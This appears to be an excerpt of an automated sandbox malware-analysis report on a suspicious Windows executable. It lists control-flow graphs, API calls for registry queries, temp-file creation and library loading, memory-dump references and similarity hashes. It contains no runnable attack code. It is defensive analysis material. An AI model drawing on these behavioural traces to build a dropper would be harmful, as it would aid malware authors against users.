                                                  control_flow_graph 746 10001759-10001795 call 10001b18 750 100018a6-100018a8 746->750 751 1000179b-1000179f 746->751 752 100017a1-100017a7 call 10002286 751->752 753 100017a8-100017b5 call 100022d0 751->753 752->753 758 100017e5-100017ec 753->758 759 100017b7-100017bc 753->759 760 1000180c-10001810 758->760 761 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 758->761 762 100017d7-100017da 759->762 763 100017be-100017bf 759->763 767 10001812-1000184c call 100015b4 call 100024a9 760->767 768 1000184e-10001854 call 100024a9 760->768 784 10001855-10001859 761->784 762->758 769 100017dc-100017dd call 10002b5f 762->769 765 100017c1-100017c2 763->765 766 100017c7-100017c8 call 100028a4 763->766 772 100017c4-100017c5 765->772 773 100017cf-100017d5 call 10002645 765->773 779 100017cd 766->779 767->784 768->784 782 100017e2 769->782 772->758 772->766 783 100017e4 773->783 779->782 782->783 783->758 788 10001896-1000189d 784->788 789 1000185b-10001869 call 1000246c 784->789 788->750 794 1000189f-100018a0 GlobalFree 788->794 796 10001881-10001888 789->796 797 1000186b-1000186e 789->797 794->750 796->788 799 1000188a-10001895 call 1000153d 796->799 797->796 798 10001870-10001878 797->798 798->796 800 1000187a-1000187b FreeLibrary 798->800 799->788 800->796
                                                  APIs
                                                    • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                    • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                    • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                  • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                  • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                  • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                    • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                    • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                    • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1479157136.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000004.00000002.1479140415.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000004.00000002.1479171762.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000004.00000002.1479188233.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_10000000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc$Librarylstrcpy
                                                  • String ID:
                                                  • API String ID: 1791698881-3916222277
                                                  • Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                  • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                  • Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                  • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 803 405e15-405e47 RegOpenKeyExW 804 405e89-405e8c 803->804 805 405e49-405e68 RegQueryValueExW 803->805 806 405e76 805->806 807 405e6a-405e6e 805->807 809 405e79-405e83 RegCloseKey 806->809 808 405e70-405e74 807->808 807->809 808->806 808->809 809->804
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E3F
                                                  • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E60
                                                  • RegCloseKey.ADVAPI32(?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E83
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: Call
                                                  • API String ID: 3677997916-1824292864
                                                  • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                  • Instruction ID: 600534e839ec184522a2ed62e812a695e1e378dc1a2fe7ff70d8343822b3fb0e
                                                  • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                  • Instruction Fuzzy Hash: A7015A3114020EEACB218F56EC08EEB3BA8EF54390F00413AF944D2220D334DA64CBE5
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405C01
                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user~1\AppData\Local\Temp\), ref: 00405C1C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-3083371207
                                                  • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                  • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                                  • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                  • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                                  APIs
                                                    • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 0040623F
                                                    • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                    • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406253
                                                    • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406266
                                                  • CreateDirectoryW.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00403347
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$CreateDirectoryPrev
                                                  • String ID: 1033$C:\Users\user~1\AppData\Local\Temp\
                                                  • API String ID: 4115351271-3049706366
                                                  • Opcode ID: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
                                                  • Instruction ID: 64a45b222adfb8bd76fd8b495f2d7cf88aee328212c381153bc1e0c9699f7593
                                                  • Opcode Fuzzy Hash: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
                                                  • Instruction Fuzzy Hash: 22D0C92251AA3135C551372A7D06FCF295C8F0A329F12A477F809B90C2CB7C2A8249FE
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                  • Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
                                                  • Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                  • Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                  • Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
                                                  • Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                  • Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                  • Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
                                                  • Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                  • Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                  • Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
                                                  • Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                  • Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                  • Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
                                                  • Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                  • Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                  • Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
                                                  • Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                  • Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                  • Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
                                                  • Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                  • Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                  • WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$PointerWrite
                                                  • String ID:
                                                  • API String ID: 539440098-0
                                                  • Opcode ID: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                  • Instruction ID: e0bff1d0cfda9ca41153e72f66d50dbc15cd376e58f7be5246e1248deba32b17
                                                  • Opcode Fuzzy Hash: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                  • Instruction Fuzzy Hash: A2315971504218EBDF20CF65ED45A9F3FB8EB08755F20807AF904EA1A0D3349E40DBA9
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00401FC3
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                    • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                    • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll), ref: 0040525F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00401FD4
                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402051
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 334405425-0
                                                  • Opcode ID: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                  • Instruction ID: 409458e37c45ac75b59f5eb787cb01d488d5b476e6d1706a1798d0305ac83909
                                                  • Opcode Fuzzy Hash: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
